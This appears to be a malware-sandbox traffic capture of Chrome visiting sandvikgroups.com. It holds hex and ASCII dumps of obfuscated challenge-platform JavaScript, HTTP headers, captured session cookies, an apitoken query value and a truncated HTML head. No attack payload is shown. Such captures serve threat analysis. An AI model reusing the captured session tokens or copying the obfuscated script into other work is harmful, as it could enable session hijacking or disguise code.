                                        Data Ascii: nction(E){return E==null?'':e.g(E,6,function(F,Y){return Y=b,Y(509)[Y(494)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,E==null)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(568)];R+=1)if(S=E[Z(494)](R),Object[Z(563)][Z
                                        2025-01-07 21:06:20 UTC1369INData Raw: 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 2e 32 35 7c 31 2e 39 31 26 55 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 5a 28 35 33 33 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 4c 2d 2d 2c 4c 3d 3d 30 26 26 4e 2b 2b 7d 66 6f 72 28 55 3d 32 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 2e 38 39 7c 55 26 31 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 5a 28 35 33 33 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 50 3c 3c 3d 31 2c 46 2d 31 3d 3d 51 29 7b 4f 5b 5a 28 35 33 33 29 5d 28 47 28 50 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 51 2b 2b 3b 72 65 74 75 72 6e 20 4f 5b 5a 28 35 31 36 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e
                                        Data Ascii: ,H=0;H<N;P=P<<1.25|1.91&U,F-1==Q?(Q=0,O[Z(533)](G(P)),P=0):Q++,U>>=1,H++);L--,L==0&&N++}for(U=2,H=0;H<N;P=P<<1.89|U&1,Q==F-1?(Q=0,O[Z(533)](G(P)),P=0):Q++,U>>=1,H++);for(;;)if(P<<=1,F-1==Q){O[Z(533)](G(P));break}else Q++;return O[Z(516)]('')},'j':function
                                        2025-01-07 21:06:20 UTC1369INData Raw: 5d 28 55 29 2c 48 5b 4a 2b 2b 5d 3d 4d 2b 55 5b 61 32 28 34 39 34 29 5d 28 30 29 2c 49 2d 2d 2c 4d 3d 55 2c 49 3d 3d 30 26 26 28 49 3d 4d 61 74 68 5b 61 32 28 35 37 35 29 5d 28 32 2c 4b 29 2c 4b 2b 2b 29 7d 7d 7d 2c 66 3d 7b 7d 2c 66 5b 58 28 36 30 38 29 5d 3d 65 2e 68 2c 66 7d 28 29 2c 6f 3d 7b 7d 2c 6f 5b 57 28 35 30 38 29 5d 3d 27 6f 27 2c 6f 5b 57 28 34 39 33 29 5d 3d 27 73 27 2c 6f 5b 57 28 36 30 35 29 5d 3d 27 75 27 2c 6f 5b 57 28 36 30 34 29 5d 3d 27 7a 27 2c 6f 5b 57 28 35 36 37 29 5d 3d 27 6e 27 2c 6f 5b 57 28 35 32 30 29 5d 3d 27 49 27 2c 6f 5b 57 28 35 37 34 29 5d 3d 27 62 27 2c 73 3d 6f 2c 68 5b 57 28 35 34 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 48 2c 61 65 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 61 65 3d 57 2c 46
                                        Data Ascii: ](U),H[J++]=M+U[a2(494)](0),I--,M=U,I==0&&(I=Math[a2(575)](2,K),K++)}}},f={},f[X(608)]=e.h,f}(),o={},o[W(508)]='o',o[W(493)]='s',o[W(605)]='u',o[W(604)]='z',o[W(567)]='n',o[W(520)]='I',o[W(574)]='b',s=o,h[W(540)]=function(E,F,G,H,ae,J,K,L,M,N,O){if(ae=W,F
                                        2025-01-07 21:06:20 UTC1369INData Raw: 64 20 30 3f 27 75 27 3a 27 78 27 7d 63 61 74 63 68 28 49 29 7b 72 65 74 75 72 6e 27 69 27 7d 72 65 74 75 72 6e 20 65 5b 61 62 28 35 31 37 29 5d 5b 61 62 28 35 35 34 29 5d 28 45 5b 46 5d 29 3f 27 61 27 3a 45 5b 46 5d 3d 3d 3d 65 5b 61 62 28 35 31 37 29 5d 3f 27 43 27 3a 21 30 3d 3d 3d 45 5b 46 5d 3f 27 54 27 3a 21 31 3d 3d 3d 45 5b 46 5d 3f 27 46 27 3a 28 47 3d 74 79 70 65 6f 66 20 45 5b 46 5d 2c 61 62 28 35 37 33 29 3d 3d 47 3f 76 28 65 2c 45 5b 46 5d 29 3f 27 4e 27 3a 27 66 27 3a 73 5b 47 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 61 28 29 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 3d 66 2d 34 39 32 2c 68 3d 65 5b 66 5d 2c 68 7d 2c 62 28 63 2c 64 29 7d 66
                                        Data Ascii: d 0?'u':'x'}catch(I){return'i'}return e[ab(517)][ab(554)](E[F])?'a':E[F]===e[ab(517)]?'C':!0===E[F]?'T':!1===E[F]?'F':(G=typeof E[F],ab(573)==G?v(e,E[F])?'N':'f':s[G]||'?')}function b(c,d,e){return e=a(),b=function(f,g,h){return f=f-492,h=e[f],h},b(c,d)}f
                                        2025-01-07 21:06:20 UTC1369INData Raw: 72 2c 73 74 61 74 75 73 2c 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 72 65 70 6c 61 63 65 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 2f 30 2e 35 32 35 36 38 30 39 34 35 30 36 38 37 37 33 38 3a 31 37 33 36 32 38 31 35 39 30 3a 33 73 70 6e 55 4e 38 4e 73 55 35 53 4e 2d 49 65 49 4a 7a 72 6c 61 77 32 37 31 43 74 6d 41 50 4d 63 61 71 6c 34 52 50 7a 33 4c 49 2f 2c 6e 61 76 69 67 61 74 6f 72 2c 69 66 72 61 6d 65 2c 68 74 74 70 2d 63 6f 64 65 3a 2c 73 69 64 2c 36 39 33 32 37 33 36 4f 4c 54 6d 62 53 2c 70 75 73 68 2c 63 61 6c 6c 2c 6f 6e 65 72 72 6f 72 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 5a 66 65 54 35 3b 41 50 6b 4e 38 3b 6b 68 62 71 74 32 3b 44 6b 43 4a 32 3b 74 4d 4f 48 35 3b 48 6c 6a 4c 31 3b 6d 42 70 45 44 36 3b 78 4a 61 69 31 3b 46 69 72 6d 45 34 3b
                                        Data Ascii: r,status,errorInfoObject,replace,fromCharCode,/0.5256809450687738:1736281590:3spnUN8NsU5SN-IeIJzrlaw271CtmAPMcaql4RPz3LI/,navigator,iframe,http-code:,sid,6932736OLTmbS,push,call,onerror,_cf_chl_opt;ZfeT5;APkN8;khbqt2;DkCJ2;tMOH5;HljL1;mBpED6;xJai1;FirmE4;
                                        2025-01-07 21:06:20 UTC1369INData Raw: 2c 21 6b 28 2e 30 31 29 29 72 65 74 75 72 6e 21 5b 5d 3b 48 3d 28 47 3d 7b 7d 2c 47 5b 61 39 28 35 34 36 29 5d 3d 45 2c 47 5b 61 39 28 35 32 32 29 5d 3d 46 2c 47 29 3b 74 72 79 7b 69 66 28 49 3d 68 5b 61 39 28 35 30 33 29 5d 2c 4a 3d 61 39 28 36 30 30 29 2b 68 5b 61 39 28 35 34 33 29 5d 5b 61 39 28 35 34 34 29 5d 2b 61 39 28 35 35 37 29 2b 31 2b 61 39 28 35 32 37 29 2b 49 2e 72 2b 61 39 28 35 38 31 29 2c 4b 3d 6e 65 77 20 68 5b 28 61 39 28 35 32 31 29 29 5d 28 29 2c 21 4b 29 72 65 74 75 72 6e 3b 4c 3d 61 39 28 35 39 36 29 2c 4d 3d 7b 7d 2c 4d 5b 61 39 28 36 30 31 29 5d 3d 68 5b 61 39 28 35 34 33 29 5d 5b 61 39 28 36 30 31 29 5d 2c 4d 5b 61 39 28 35 36 34 29 5d 3d 68 5b 61 39 28 35 34 33 29 5d 5b 61 39 28 35 36 34 29 5d 2c 4d 5b 61 39 28 35 39 30 29 5d 3d
                                        Data Ascii: ,!k(.01))return![];H=(G={},G[a9(546)]=E,G[a9(522)]=F,G);try{if(I=h[a9(503)],J=a9(600)+h[a9(543)][a9(544)]+a9(557)+1+a9(527)+I.r+a9(581),K=new h[(a9(521))](),!K)return;L=a9(596),M={},M[a9(601)]=h[a9(543)][a9(601)],M[a9(564)]=h[a9(543)][a9(564)],M[a9(590)]=
                                        2025-01-07 21:06:20 UTC36INData Raw: 31 65 33 29 2c 66 2d 65 3e 64 29 29 72 65 74 75 72 6e 21 5b 5d 3b 72 65 74 75 72 6e 21 21 5b 5d 7d 7d 28 29
                                        Data Ascii: 1e3),f-e>d))return![];return!![]}}()


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        37192.168.2.449801188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:21 UTC801OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/849bfe45bf45/main.js? HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc
                                        2025-01-07 21:06:21 UTC904INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:21 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 8782
                                        Connection: close
                                        cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                        x-content-type-options: nosniff
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2ByboaYnX51OXgbdeSCZVGREgAc7ZEl6yrMQefgSUTJrRJ4ZZw2S1KsbDGbHk9jteqU180E0%2BFB6juLCKnPSL9%2BIsxXlqJSWmpoz%2F2Kp8H70uss%2BawEwlmB%2FUN2gb4nHrMxDFYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e942ebcb0cbe-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1635&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1379&delivery_rate=1696687&cwnd=166&unsent_bytes=0&cid=e2954644fb7d8ca9&ts=156&x=0"
                                        2025-01-07 21:06:21 UTC465INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 78 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 56 2c 66 2c 67 29 7b 66 6f 72 28 56 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 34 34 38 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 56 28 34 31 35 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 56 28 35 31 37 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 56 28 34 39 39 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 56 28 35 30 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 56 28 34 37 35 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 56 28 35 31 31 29 29 2f 37 29 2b 70 61
                                        Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=-parseInt(V(448))/1*(-parseInt(V(415))/2)+parseInt(V(517))/3*(-parseInt(V(499))/4)+parseInt(V(509))/5+parseInt(V(475))/6*(parseInt(V(511))/7)+pa
                                        2025-01-07 21:06:21 UTC1369INData Raw: 27 2c 6a 5b 57 28 34 37 33 29 5d 3d 27 75 27 2c 6a 5b 57 28 34 38 39 29 5d 3d 27 7a 27 2c 6a 5b 57 28 34 37 36 29 5d 3d 27 6e 27 2c 6a 5b 57 28 34 32 30 29 5d 3d 27 49 27 2c 6a 5b 57 28 34 35 35 29 5d 3d 27 62 27 2c 6b 3d 6a 2c 68 5b 57 28 34 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 45 2c 46 2c 47 2c 61 31 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 61 31 3d 57 2c 45 3d 3d 3d 6e 75 6c 6c 7c 7c 45 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 47 3b 66 6f 72 28 49 3d 6e 28 45 29 2c 67 5b 61 31 28 34 37 32 29 5d 5b 61 31 28 34 36 35 29 5d 26 26 28 49 3d 49 5b 61 31 28 34 31 38 29 5d 28 67 5b 61 31 28 34 37 32 29 5d 5b 61 31 28 34 36 35 29 5d 28 45 29 29 29 2c 49 3d 67 5b 61 31 28 34 37 30 29 5d 5b 61 31 28 34 36 37 29 5d 26 26 67 5b 61 31
                                        Data Ascii: ',j[W(473)]='u',j[W(489)]='z',j[W(476)]='n',j[W(420)]='I',j[W(455)]='b',k=j,h[W(452)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,E===null||E===void 0)return G;for(I=n(E),g[a1(472)][a1(465)]&&(I=I[a1(418)](g[a1(472)][a1(465)](E))),I=g[a1(470)][a1(467)]&&g[a1
                                        2025-01-07 21:06:21 UTC1369INData Raw: 3d 4d 2b 2b 2c 4a 5b 53 5d 3d 21 30 29 2c 54 3d 4b 2b 53 2c 4f 62 6a 65 63 74 5b 61 37 28 34 35 31 29 5d 5b 61 37 28 35 32 37 29 5d 5b 61 37 28 35 32 32 29 5d 28 49 2c 54 29 29 4b 3d 54 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 37 28 34 35 31 29 5d 5b 61 37 28 35 32 37 29 5d 5b 61 37 28 35 32 32 29 5d 28 4a 2c 4b 29 29 7b 69 66 28 32 35 36 3e 4b 5b 61 37 28 34 38 35 29 5d 28 30 29 29 7b 66 6f 72 28 48 3d 30 3b 48 3c 4e 3b 50 3c 3c 3d 31 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 61 37 28 34 38 37 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 37 28 34 38 35 29 5d 28 30 29 2c 48 3d 30 3b 38 3e 48 3b 50 3d 31 2e 36 34 26 55 7c 50 3c 3c 31 2e 39 39 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 37
                                        Data Ascii: =M++,J[S]=!0),T=K+S,Object[a7(451)][a7(527)][a7(522)](I,T))K=T;else{if(Object[a7(451)][a7(527)][a7(522)](J,K)){if(256>K[a7(485)](0)){for(H=0;H<N;P<<=1,Q==F-1?(Q=0,O[a7(487)](G(P)),P=0):Q++,H++);for(U=K[a7(485)](0),H=0;8>H;P=1.64&U|P<<1.99,F-1==Q?(Q=0,O[a7
                                        2025-01-07 21:06:21 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 45 2c 61 38 29 7b 72 65 74 75 72 6e 20 61 38 3d 61 35 2c 6e 75 6c 6c 3d 3d 45 3f 27 27 3a 27 27 3d 3d 45 3f 6e 75 6c 6c 3a 66 2e 69 28 45 5b 61 38 28 35 30 36 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 61 39 29 7b 72 65 74 75 72 6e 20 61 39 3d 61 38 2c 45 5b 61 39 28 34 38 35 29 5d 28 46 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 61 61 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 55 2c 54 29 7b 66 6f 72 28 61 61 3d 61 35 2c 48 3d 5b 5d 2c 49 3d 34 2c 4a 3d 34 2c 4b 3d 33 2c 4c 3d 5b 5d 2c 4f 3d 47 28 30 29 2c 50 3d 46 2c 51 3d 31 2c 4d 3d 30 3b 33 3e 4d 3b 48 5b 4d 5d 3d 4d 2c 4d 2b 3d 31 29 3b 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 61 28 35 30 33
                                        Data Ascii: unction(E,a8){return a8=a5,null==E?'':''==E?null:f.i(E[a8(506)],32768,function(F,a9){return a9=a8,E[a9(485)](F)})},'i':function(E,F,G,aa,H,I,J,K,L,M,N,O,P,Q,R,S,U,T){for(aa=a5,H=[],I=4,J=4,K=3,L=[],O=G(0),P=F,Q=1,M=0;3>M;H[M]=M,M+=1);for(R=0,S=Math[aa(503
                                        2025-01-07 21:06:21 UTC1369INData Raw: 67 5b 45 5d 5b 59 28 34 35 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 27 70 27 7d 63 61 74 63 68 28 47 29 7b 7d 74 72 79 7b 69 66 28 6e 75 6c 6c 3d 3d 67 5b 45 5d 29 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 67 5b 45 5d 3f 27 75 27 3a 27 78 27 7d 63 61 74 63 68 28 48 29 7b 72 65 74 75 72 6e 27 69 27 7d 72 65 74 75 72 6e 20 65 5b 59 28 34 37 30 29 5d 5b 59 28 34 31 30 29 5d 28 67 5b 45 5d 29 3f 27 61 27 3a 67 5b 45 5d 3d 3d 3d 65 5b 59 28 34 37 30 29 5d 3f 27 43 27 3a 21 30 3d 3d 3d 67 5b 45 5d 3f 27 54 27 3a 21 31 3d 3d 3d 67 5b 45 5d 3f 27 46 27 3a 28 46 3d 74 79 70 65 6f 66 20 67 5b 45 5d 2c 59 28 34 38 31 29 3d 3d 46 3f 6c 28 65 2c 67 5b 45 5d 29 3f 27 4e 27 3a 27 66 27 3a 6b 5b 46 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 42
                                        Data Ascii: g[E][Y(457)](function(){}),'p'}catch(G){}try{if(null==g[E])return void 0===g[E]?'u':'x'}catch(H){return'i'}return e[Y(470)][Y(410)](g[E])?'a':g[E]===e[Y(470)]?'C':!0===g[E]?'T':!1===g[E]?'F':(F=typeof g[E],Y(481)==F?l(e,g[E])?'N':'f':k[F]||'?')}function B
                                        2025-01-07 21:06:21 UTC1369INData Raw: 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 2c 63 61 6c 6c 2c 63 6c 69 65 6e 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 2c 63 68 61 72 41 74 2c 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 2c 6f 62 6a 65 63 74 2c 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 2c 6f 70 65 6e 2c 6d 61 70 2c 74 6f 53 74 72 69 6e 67 2c 2f 62 65 61 63 6f 6e 2f 6f 76 2c 61 70 70 65 6e 64 43 68 69 6c 64 2c 69 73 41 72 72 61 79 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 72 65 70 6c 61 63 65 2c 74 69 6d 65 6f 75 74 2c 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 2c 31 31 37 39 39 32 41 43 52 4a 6e 6b 2c 30 2e 30 35 38 33 33 33 32 33 30 35 35 32 35 30 36 37 31 34 3a 31
                                        Data Ascii: i/challenge-platform/h/,call,clientInformation,charAt,contentDocument,object,hasOwnProperty,application/json,_cf_chl_opt,open,map,toString,/beacon/ov,appendChild,isArray,addEventListener,replace,timeout,DOMContentLoaded,117992ACRJnk,0.058333230552506714:1
                                        2025-01-07 21:06:21 UTC1369INData Raw: 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 27 2e 73 70 6c 69 74 28 27 2c 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 6d 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 64 2c 65 2c 61 64 2c 66 2c 67 2c 45 2c 46 29 7b 61 64 3d 57 2c 66 3d 68 5b 61 64 28 34 39 34 29 5d 2c 67 3d 66 2e 72 2c 45 3d 7b 27 77 70 27 3a 78 5b 61 64 28 34 33 35 29 5d 28 4a 53 4f 4e 5b 61 64 28 35 31 33 29 5d 28 64 29 29 2c 27 73 27 3a 61 64 28 34 31 36 29 7d 2c 46 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 46 5b 61 64 28 34 30 35 29 5d 28 61 64 28 34 36 30 29 2c 61 64 28 35 32 31 29 2b 68 5b 61 64 28 34 30 34 29 5d 5b 61 64 28 34 39 37 29 5d 2b 61 64 28 34 32 31 29 2b 67 29 2c 46 5b 61 64 28 34 32 38 29 5d 28 61 64 28 34
                                        Data Ascii: nreadystatechange'.split(','),a=function(){return am},a()}function A(d,e,ad,f,g,E,F){ad=W,f=h[ad(494)],g=f.r,E={'wp':x[ad(435)](JSON[ad(513)](d)),'s':ad(416)},F=new XMLHttpRequest(),F[ad(405)](ad(460),ad(521)+h[ad(404)][ad(497)]+ad(421)+g),F[ad(428)](ad(4
                                        2025-01-07 21:06:21 UTC103INData Raw: 39 29 5d 28 44 61 74 65 5b 61 63 28 34 35 38 29 5d 28 29 2f 31 65 33 29 2c 67 2d 66 3e 65 29 29 72 65 74 75 72 6e 21 5b 5d 3b 72 65 74 75 72 6e 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 79 28 64 2c 61 62 29 7b 72 65 74 75 72 6e 20 61 62 3d 57 2c 4d 61 74 68 5b 61 62 28 35 30 31 29 5d 28 29 3c 64 7d 7d 28 29
                                        Data Ascii: 9)](Date[ac(458)]()/1e3),g-f>e))return![];return!![]}function y(d,ab){return ab=W,Math[ab(501)]()<d}}()


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        38192.168.2.449803188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:21 UTC1957OUTGET /?auth&apitoken=qrd0fg2hx9ez7rr HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:22 UTC1196INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=ac667dfa18e02e513ed41eabccae044c; path=/
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nTmiJldJRArj9lNXWVIJK1mMuoksNs3Yu8we3SfxBH9RG%2Bjw%2BD3Jyzm3AQmWLxBhnrFJNhcVdTCzVDddSssXDnAnU7HEK%2Fnwe3PCaOipPcEKfi4xYV1hPa%2FFUsEOhHJzlk6Fuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e9464fad422f-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1726&rtt_var=670&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2557&delivery_rate=1606160&cwnd=137&unsent_bytes=0&cid=ad59700d4d84ae09&ts=664&x=0"
                                        2025-01-07 21:06:22 UTC173INData Raw: 32 33 37 33 0d 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65
                                        Data Ascii: 2373<head><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-e
